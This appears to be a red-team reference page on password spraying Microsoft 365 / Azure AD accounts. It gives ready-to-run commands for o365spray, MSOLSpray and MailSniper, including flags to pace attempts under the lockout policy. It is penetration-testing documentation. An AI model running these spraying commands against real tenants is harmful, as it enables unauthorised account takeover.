Password Spraying

Theory

Once a list of existing usernames is established, a password spray attack can be executed to attempt retrieving passwords for these accounts. Password spraying involves using a single password (e.g., 'Password01') or a small set of common passwords across multiple accounts.

Practice

o365spray (python) can be used for for password spraying as follows. It supports various methods: activesync, adfs, autodiscover, autologon, oauth2, reporting, rst

The oAuth2 module can be used for federated spraying, but it should be noted that this will ONLY work when the target tenant has enabled password synchronization - otherwise authentication will always fail. The default mechanic is to default to the 'adfs' module when federation is identified.

# --spray: Password Spray Mode
# -U: Userfile
# -P: password file
# -p password
# --count: Number of password attempt per user before resetting lockout timer
# --lockout: Lockout policy's reset time (in minutes).
# -d: Target domain
# --spray-module: activesync, adfs, autodiscover, autologon, oauth2, reporting, rst

python o365spray.py --spray -U usernames.txt -p passwords.tx --count 2 --lockout 5 --domain test.com

MSOLSpray (PowerShell) can be used for for password spraying as follows.

Invoke-MSOLSpray -UserList valid-emails.txt -Password <PASSWORD> -Verbose

MailSniper (PowerShell) can be used for for password spraying as follows

Invoke-PasswordSprayEWS -ExchHostname outlook.office365.com -UserList valid-emails.txt -Password <PASSWORD>

Resources

Azure AD introduction for red teamersSynacktiv

Last updated 3 months ago

Was this helpful?